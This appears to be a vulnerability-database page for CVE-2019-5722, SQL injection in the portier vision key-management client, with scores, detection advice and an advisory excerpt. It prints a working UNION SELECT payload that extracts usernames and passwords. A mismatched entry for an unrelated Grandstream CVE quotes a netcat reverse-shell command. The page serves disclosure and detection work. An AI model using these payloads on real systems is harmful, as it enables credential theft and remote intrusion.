CVE-2019-5722
published 2019-03-21CVE-2019-5722: An issue was discovered in portier vision 4.4.4.2 and 4.4.4.6. Due to a lack of user input validation in parameter handling, it has various SQL injections…
PriorityP259critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.90%
89.0th percentile
An issue was discovered in portier vision 4.4.4.2 and 4.4.4.6. Due to a lack of user input validation in parameter handling, it has various SQL injections, including on the login form, and on the search form for a key ring number.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| portier | portier | — | — |
| portier | portier | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command') UNION SELECT 1,user_kz,passwort,1,1,1,1,1,1,1 FROM BENUTZER WHERE (systemuser = 1) AND ('a%' = 'a↗
commandSELECT BUND.BUND_ID, BUND.BUNDNUMMER, BUND.BESCHREIBUNG, BUND.ABTEILUNG, BUND.BEREICH, BUND.KOSTENSTELLE, DEPOT.BEZEICHNUNG as DEP_BEZEICHNUNG, BUND.BEMERKUNG_1, BUND.BEMERKUNG_2, BUND.BEMERKUNG_3 FROM BUND BUND LEFT OUTER JOIN DEPOT DEPOT ON DEPOT.DEPOT_ID = BUND.DEPOT_ID WHERE ( 1 = 1 ) AND (upper(BUND.BUNDNUMMER) LIKE '') UNION SELECT 1,user_kz,passwort,1,1,1,1,1,1,1 FROM BENUTZER WHERE (systemuser = 1) AND ('a%' = 'a%')↗
- →Monitor database traffic for UNION SELECT payloads targeting the BENUTZER table, particularly queries extracting user_kz and passwort columns — indicative of credential harvesting via SQLi in the key ring number search field. ↗
- →The application communicates with its database (Firebird or MS SQL) in plain text; network sniffing of database traffic can reveal injected queries. Monitor for anomalous UNION SELECT statements in database wire traffic on the relevant DB port. ↗
- →The login form username field is also injectable; monitor for SQL metacharacters (e.g., single quotes, UNION keywords) in authentication requests to the portier vision client-server database connection. ↗
- →Stacked queries do not work against both supported backends; UNION-based injection is the primary viable technique. Detection should focus on UNION SELECT patterns in queries against BUND.BUNDNUMMER and login parameters. ↗
- ·The SQL injection payload structure differs slightly between Firebird and MS SQL backends: Firebird does not support UNION SELECT when the full query is terminated by an ORDER BY clause, reducing the number of exploitable fields on that backend. ↗
- ·Authentication bypass via the login form SQLi is NOT possible because authentication logic is implemented client-side, not server-side; however, credential theft (encrypted passwords) of supervisor accounts remains a high-impact attack path. ↗
- ·No vendor patch was available at time of disclosure; the solution status was listed as Open and SySS GmbH was not aware of a fix from the manufacturer. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection
exploitdb·2019-01-14·CVSS 9.8
CVE-2019-5722 [CRITICAL] Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection
Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection
---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2018-012
Product: PORTIER
Affected Version(s): 4.4.4.2, 4.4.4.6
Tested Version(s): 4.4.4.2, 4.4.4.6
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: HIGH
Solution Status: Open
Manufacturer Notification: 2018-06-13
Solution Date: -
Public Disclosure: 2018-01-09
CVE Reference: CVE-2019-5722
Author of Advisory: Christian Pappas, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
portier vision is a rich client application for managing door keys allocated
to certain persons or group of persons.
The manufacturer describes the product as follows (see [1]):
"portierA(r) vision
* manages locking systems and access rig
Metasploit
Grandstream UCM62xx IP PBX sendPasswordEmail RCE
metasploit·CVSS 8.8
CVE-2020-5722 [HIGH] Grandstream UCM62xx IP PBX sendPasswordEmail RCE
Grandstream UCM62xx IP PBX sendPasswordEmail RCE
This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an unauthenticated remote attacker to execute commands as root. Exploitation happens in two stages: 1. An SQL injection during username lookup while executing the "Forgot Password" function. 2. A command injection that occurs after the user provided username is passed to a Python script via the shell. Like so: /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e
No writeups or analysis indexed.
http://packetstormsecurity.com/files/151117/PORTIER-4.4.4.2-4.4.4.6-SQL-Injection.htmlhttps://seclists.org/bugtraq/2019/Jan/7https://www.exploit-db.com/exploits/46163/https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-012.txthttp://packetstormsecurity.com/files/151117/PORTIER-4.4.4.2-4.4.4.6-SQL-Injection.htmlhttps://seclists.org/bugtraq/2019/Jan/7https://www.exploit-db.com/exploits/46163/https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-012.txt
2019-03-21
Published